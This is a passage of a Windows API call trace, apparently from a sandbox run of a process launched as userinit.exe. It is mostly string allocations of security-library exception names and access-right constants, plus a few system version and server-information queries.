[0170.544] SysReAllocStringLen (in: pbstr=0x28defa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x28defa0*="EJwsclAdjustPrivilegeException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28def88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x28def88*="EJwsclPrivilegeCheckException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28def70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x28def70*="EJwsclPrivilegeNotFoundException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28def58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x28def58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28def40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x28def40*="EJwsclPrivilegeException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28def28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x28def28*="EJwsclNotEnoughMemory") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28def10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x28def10*="EJwsclInvalidTokenHandle") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28deef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x28deef8*="EJwsclNoThreadTokenAvailable") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28deee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x28deee0*="EJwsclDuplicateTokenException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28deec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x28deec8*="EJwsclInvalidOwnerException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28deeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x28deeb0*="EJwsclInvalidPrimaryToken") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x28dee98*="EJwsclTokenPrimaryException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x28dee80*="EJwsclTokenImpersonationException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x28dee68*="EJwsclTokenInformationException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x28dee50*="EJwsclSharedTokenException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x28dee38*="EJwsclOpenProcessTokenException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x28dee20*="EJwsclOpenThreadTokenException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x28dee08*="EJwsclSecurityException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28dedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x28dedf0*="Exception") returned 1
[0170.544] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.544] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0170.544] GetVersionExA (in: lpVersionInformation=0xaf3a4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x1f0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xcc\xf3\x0a") | out: lpVersionInformation=0xaf3a4*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0170.544] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0170.544] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0170.550] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0170.550] NetServerGetInfo (in: servername="", level=0x65, bufptr=0xaf428 | out: bufptr=0xaf428) returned 0x0
[0170.554] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0170.554] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0170.554] NetApiBufferFree (Buffer=0x211d00) returned 0x0
[0170.554] SetErrorMode (uMode=0x8000) returned 0x1
[0170.554] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0170.555] SetErrorMode (uMode=0x1) returned 0x8000
[0170.555] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0170.556] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0170.557] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0170.559] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0170.560] SysReAllocStringLen (in: pbstr=0x28dec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28dec40*="DELETE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28dec30*="READ_CONTROL") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28dec20*="WRITE_OWNER") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28dec10*="WRITE_DAC") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x28dec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28debf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x28debf0*="FILE_READ_ATTRIBUTES") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28debe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x28debe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28debd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x28debd0*="FILE_WRITE_DATA") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28debc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x28debc0*="FILE_READ_DATA") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28debb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x28debb0*="FILE_ALL_ACCESS") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28deba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28deb90*="STANDARD_RIGHTS_WRITE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28deb80*="STANDARD_RIGHTS_READ") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28deb70*="STANDARD_RIGHTS_ALL") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28deb50*="DELETE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28deb40*="READ_CONTROL") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28deb30*="WRITE_OWNER") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28deb20*="WRITE_DAC") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x28deb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x28deb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x28deaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x28deae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x28dead0*="TOKEN_QUERY_SOURCE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x28deac0*="TOKEN_QUERY") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x28deab0*="TOKEN_IMPERSONATE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28deaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x28deaa0*="TOKEN_DUPLICATE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x28dea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x28dea80*="TOKEN_ALL_ACCESS") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28dea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28dea60*="STANDARD_RIGHTS_WRITE") returned 1
[0170.560] SysReAllocStringLen (in: pbstr=0x28dea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28dea50*="STANDARD_RIGHTS_READ") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28dea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28dea40*="STANDARD_RIGHTS_ALL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28dea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28dea30*="DELETE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28dea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28dea20*="READ_CONTROL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28dea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28dea10*="WRITE_OWNER") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28dea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28dea00*="WRITE_DAC") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x28de9f0*="TIMER_MODIFY_STATE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x28de9e0*="TIMER_QUERY_STATE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x28de9d0*="TIMER_ALL_ACCESS") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de9a0*="STANDARD_RIGHTS_READ") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de990*="STANDARD_RIGHTS_ALL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de980*="DELETE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de970*="READ_CONTROL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de960*="WRITE_OWNER") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de950*="WRITE_DAC") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x28de940*="SECTION_EXTEND_SIZE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x28de930*="FILE_MAP_READ") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x28de920*="FILE_MAP_WRITE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x28de910*="FILE_MAP_COPY") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x28de900*="FILE_MAP_ALL_ACCESS") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de8d0*="STANDARD_RIGHTS_READ") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de8c0*="STANDARD_RIGHTS_ALL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de8b0*="DELETE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de8a0*="READ_CONTROL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de890*="WRITE_OWNER") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de880*="WRITE_DAC") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x28de870*="MUTEX_MODIFY_STATE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x28de860*="MUTEX_ALL_ACCESS") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de840*="STANDARD_RIGHTS_WRITE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de830*="STANDARD_RIGHTS_READ") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de820*="STANDARD_RIGHTS_ALL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de810*="DELETE") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de800*="READ_CONTROL") returned 1
[0170.561] SysReAllocStringLen (in: pbstr=0x28de7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de7f0*="WRITE_OWNER") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de7e0*="WRITE_DAC") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x28de7d0*="EVENT_MODIFY_STATE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x28de7c0*="EVENT_ALL_ACCESS") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de790*="STANDARD_RIGHTS_READ") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de780*="STANDARD_RIGHTS_ALL") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de770*="DELETE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de760*="READ_CONTROL") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de750*="WRITE_OWNER") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de740*="WRITE_DAC") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x28de730*="SEMAPHORE_MODIFY_STATE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x28de720*="SEMAPHORE_ALL_ACCESS") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de700*="STANDARD_RIGHTS_WRITE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de6f0*="STANDARD_RIGHTS_READ") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de6e0*="STANDARD_RIGHTS_ALL") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de6d0*="DELETE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de6c0*="READ_CONTROL") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de6b0*="WRITE_OWNER") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de6a0*="WRITE_DAC") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x28de690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x28de680*="JOB_OBJECT_TERMINATE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x28de670*="JOB_OBJECT_QUERY") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x28de660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x28de650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x28de640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de620*="STANDARD_RIGHTS_WRITE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de610*="STANDARD_RIGHTS_READ") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de600*="STANDARD_RIGHTS_ALL") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de5f0*="DELETE") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de5e0*="READ_CONTROL") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de5d0*="WRITE_OWNER") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de5c0*="WRITE_DAC") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x28de5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0170.562] SysReAllocStringLen (in: pbstr=0x28de5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x28de5a0*="THREAD_IMPERSONATE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x28de590*="THREAD_SET_THREAD_TOKEN") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x28de580*="THREAD_QUERY_INFORMATION") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x28de570*="THREAD_SET_INFORMATION") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x28de560*="THREAD_SET_CONTEXT") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x28de550*="THREAD_GET_CONTEXT") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x28de540*="THREAD_SUSPEND_RESUME") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x28de530*="THREAD_TERMINATE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x28de520*="THREAD_ALL_ACCESS") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de500*="STANDARD_RIGHTS_WRITE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de4f0*="STANDARD_RIGHTS_READ") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de4e0*="STANDARD_RIGHTS_ALL") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de4d0*="DELETE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de4c0*="READ_CONTROL") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de4b0*="WRITE_OWNER") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de4a0*="WRITE_DAC") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x28de490*="PROCESS_QUERY_INFORMATION") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x28de480*="PROCESS_SET_INFORMATION") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x28de470*="PROCESS_SET_QUOTA") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x28de460*="PROCESS_CREATE_PROCESS") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x28de450*="PROCESS_DUP_HANDLE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x28de440*="PROCESS_VM_WRITE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x28de430*="PROCESS_VM_READ") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x28de420*="PROCESS_VM_OPERATION") returned 1
